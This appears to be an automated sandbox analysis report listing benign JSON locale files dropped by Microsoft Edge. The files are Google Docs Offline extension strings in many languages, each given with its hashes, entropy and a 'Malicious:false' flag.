                                                                                                                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
